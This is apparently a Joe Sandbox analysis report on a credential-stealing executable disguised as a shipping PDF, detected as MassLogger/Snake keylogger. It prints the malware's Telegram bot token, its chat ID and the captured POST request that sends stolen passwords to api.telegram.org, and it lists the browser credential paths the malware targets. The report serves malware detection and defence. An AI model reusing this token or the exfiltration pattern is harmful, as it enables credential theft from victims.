Edit tour

Windows Analysis Report
Shipment Document BL,INV and packing list.pdf.exe

Overview

General Information

Sample name:	Shipment Document BL,INV and packing list.pdf.exe
Analysis ID:	1640472
MD5:	5fd799c047c81a8efb15d9a32f1d8e39
SHA1:	fe01653460b4435266a8d3a3bdab26def6a9b2f7
SHA256:	ffac68d784d7cd99536b0664ff0a765371c8bf0d0836fce71fa8a29afa9cb5c3
Infos:

Detection

MSIL Logger, MassLogger RAT

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Suspicious Double Extension File Execution

Suricata IDS alerts for network traffic

Yara detected MSIL Logger

Yara detected MassLogger RAT

Yara detected Telegram RAT

Binary is likely a compiled AutoIt script file

Initial sample is a PE file and has a suspicious name

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses an obfuscated file name to hide its real file extension (double extension)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates processes with suspicious names

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious DNS Query for IP Lookup Service APIs

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w7x64

Shipment Document BL,INV and packing list.pdf.exe (PID: 3680 cmdline: "C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe" MD5: 5FD799C047C81A8EFB15D9A32F1D8E39)

RegSvcs.exe (PID: 3720 cmdline: "C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe" MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)

cleanup

Malware Configuration

Threatname: Telegram RAT

{
  "C2 url": "https://api.telegram.org/bot7686228576:AAFCRREYytnmTaqdF-c37qTodNKZZxoFsFg/sendMessage"
}

Threatname: MassLogger

{
  "EXfil Mode": "Telegram",
  "Telegram Token": "7686228576:AAFCRREYytnmTaqdF-c37qTodNKZZxoFsFg",
  "Telegram Chatid": "7632407857"
}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xefb7:$a1: get_encryptedPassword 0xf2df:$a2: get_encryptedUsername 0xed52:$a3: get_timePasswordChanged 0xee73:$a4: get_passwordField 0xefcd:$a5: set_encryptedPassword 0x10929:$a7: get_logins 0x105da:$a8: GetOutlookPasswords 0x103cc:$a9: StartKeylogger 0x10879:$a10: KeyLoggerEventArgs 0x10429:$a11: KeyLoggerEventArgsEventHandler
00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1b7:$a1: get_encryptedPassword 0xf4df:$a2: get_encryptedUsername 0xef52:$a3: get_timePasswordChanged 0xf073:$a4: get_passwordField 0xf1cd:$a5: set_encryptedPassword 0x10b29:$a7: get_logins 0x107da:$a8: GetOutlookPasswords 0x105cc:$a9: StartKeylogger 0x10a79:$a10: KeyLoggerEventArgs 0x10629:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14163:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13661:$a3: \Google\Chrome\User Data\Default\Login Data 0x1396f:$a4: \Orbitum\User Data\Default\Login Data 0x14767:$a5: \Kometa\User Data\Default\Login Data
Process Memory Space: Shipment Document BL,INV and packing list.pdf.exe PID: 3680	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: Shipment Document BL,INV and packing list.pdf.exe PID: 3680	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Shipment Document BL,INV and packing list.pdf.exe PID: 3680	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
Process Memory Space: Shipment Document BL,INV and packing list.pdf.exe PID: 3680	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Shipment Document BL,INV and packing list.pdf.exe PID: 3680	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x16b5a1:$a1: get_encryptedPassword 0x16b8ba:$a2: get_encryptedUsername 0x16b350:$a3: get_timePasswordChanged 0x16b471:$a4: get_passwordField 0x16b5b7:$a5: set_encryptedPassword 0x16ceba:$a7: get_logins 0x16cb6b:$a8: GetOutlookPasswords 0x16c95d:$a9: StartKeylogger 0x16ce0a:$a10: KeyLoggerEventArgs 0x16c9ba:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 3720	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 3720	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 3720	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
Process Memory Space: RegSvcs.exe PID: 3720	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 3720	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1091e:$a1: get_encryptedPassword 0x10c37:$a2: get_encryptedUsername 0x106cd:$a3: get_timePasswordChanged 0x107ee:$a4: get_passwordField 0x10934:$a5: set_encryptedPassword 0x12237:$a7: get_logins 0x11ee8:$a8: GetOutlookPasswords 0x11cda:$a9: StartKeylogger 0x12187:$a10: KeyLoggerEventArgs 0x11d37:$a11: KeyLoggerEventArgsEventHandler
Click to see the 19 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Double Extension File Execution

Source: Process started

Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe", CommandLine: "C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe", CommandLine|base64offset|contains: ., Image: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe, NewProcessName: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe, OriginalFileName: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe", ProcessId: 3680, ProcessName: Shipment Document BL,INV and packing list.pdf.exe

Sigma detected: Suspicious DNS Query for IP Lookup Service APIs

Source: DNS query

Author: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, QueryName: checkip.dyndns.org

Suricata Signatures

ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-17T11:09:46.968357+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.22	49163	149.154.167.220	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-17T11:09:40.070606+0100	2803274	2	Potentially Bad Traffic	192.168.2.22	49161	132.226.247.73	80	TCP
2025-03-17T11:09:46.217032+0100	2803274	2	Potentially Bad Traffic	192.168.2.22	49161	132.226.247.73	80	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-17T11:09:46.712421+0100	1810008	1	Potentially Bad Traffic	192.168.2.22	49163	149.154.167.220	443	TCP

Joe Sandbox Signatures

• AV Detection
• Location Tracking
• Compliance
• Networking
• System Summary
• Persistence and Installation Behavior
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• HIPS / PFW / Operating System Protection Evasion
• Language, Device and Operating System Detection
• Lowering of HIPS / PFW / Operating System Security Settings
• Stealing of Sensitive Information
• Remote Access Functionality

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7686228576:AAFCRREYytnmTaqdF-c37qTodNKZZxoFsFg", "Telegram Chatid": "7632407857"}
Source: RegSvcs.exe.3720.2.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7686228576:AAFCRREYytnmTaqdF-c37qTodNKZZxoFsFg/sendMessage"}

Multi AV Scanner detection for submitted file

Source: Shipment Document BL,INV and packing list.pdf.exe

ReversingLabs: Detection: 50%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Shipment Document BL,INV and packing list.pdf.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.22:49162 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49163 version: TLS 1.2

Source:

Binary string: wntdll.pdb source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.355434952.0000000002A90000.00000004.00001000.00020000.00000000.sdmp, Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.356665790.0000000002BF0000.00000004.00001000.00020000.00000000.sdmp

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.22:49163 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.22:49163 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7686228576:AAFCRREYytnmTaqdF-c37qTodNKZZxoFsFg/sendDocument?chat_id=7632407857&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd651a7455f1eaHost: api.telegram.orgContent-Length: 1089Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: reallyfreegeoip.org

Source: Network traffic

Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49161 -> 132.226.247.73:80

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown

HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.22:49162 version: TLS 1.0

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7686228576:AAFCRREYytnmTaqdF-c37qTodNKZZxoFsFg/sendDocument?chat_id=7632407857&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd651a7455f1eaHost: api.telegram.orgContent-Length: 1089Connection: Keep-Alive

Source: RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.orgX
Source: RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.comX
Source: RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879714743.0000000002096000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000002.00000002.879714743.0000000002021000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879921863.00000000057F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/X
Source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.orgX
Source: RegSvcs.exe, 00000002.00000002.879921863.00000000057F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: RegSvcs.exe, 00000002.00000002.879921863.00000000057F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: RegSvcs.exe, 00000002.00000002.879714743.00000000020BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: RegSvcs.exe, 00000002.00000002.879714743.00000000020BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.orgX
Source: RegSvcs.exe, 00000002.00000002.879714743.0000000002021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: RegSvcs.exe, 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7686228576:AAFCRREYytnmTaqdF-c37qTodNKZZxoFsFg/sendDocument?chat_id=7632
Source: RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189X
Source: RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49162

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49163 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: Process Memory Space: Shipment Document BL,INV and packing list.pdf.exe PID: 3680, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 3720, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Binary is likely a compiled AutoIt script file

Source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.358518900.00000000011A4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_36456399-d
Source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.358518900.00000000011A4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_f6eaea43-4
Source: Shipment Document BL,INV and packing list.pdf.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_bc045e3a-7
Source: Shipment Document BL,INV and packing list.pdf.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_ec850c34-a

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Shipment Document BL,INV and packing list.pdf.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe	Memory allocated: 770B0000 page execute and read and write			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Memory allocated: 770B0000 page execute and read and write			Jump to behavior

Source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.355085552.0000000002CF0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Shipment Document BL,INV and packing list.pdf.exe
Source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000003.355227026.0000000002B6D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Shipment Document BL,INV and packing list.pdf.exe
Source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.358453034.0000000000B4F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRegSvcs.exeT vs Shipment Document BL,INV and packing list.pdf.exe
Source: Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs Shipment Document BL,INV and packing list.pdf.exe

Source: Shipment Document BL,INV and packing list.pdf.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
